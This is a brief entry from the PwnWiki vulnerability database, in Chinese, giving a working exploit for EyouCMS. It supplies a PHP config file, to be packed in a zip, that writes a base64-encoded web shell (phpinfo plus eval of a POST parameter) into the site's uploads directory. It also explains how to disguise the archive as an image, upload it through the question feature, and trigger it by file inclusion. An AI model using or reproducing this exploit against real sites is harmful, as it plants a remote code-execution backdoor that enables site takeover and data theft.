PWNWIK.COM
,
漏洞影响
EyouCMS
漏洞利用
制作如下结构的压缩文件:
-weapp --test ---config.php
config.php:
<?php
file_put_contents("./uploads/allimg/0427bd01edea972d400a106514ab7f68.php",base64_decode("PD9waHAgcGhwaW5mbygp00BldmFsKCRfUE9TVFsyMzNdKTs/Pg=="));
?>
在提问功能处可以上传图片,把恶意压缩包改成图片后缀传上去,得到一个上传后的图片路径,在构造报文触发文件包含。
phpinfo已经成功执行。
免费、自由、人人可编辑的漏洞库--PwnWiki.com
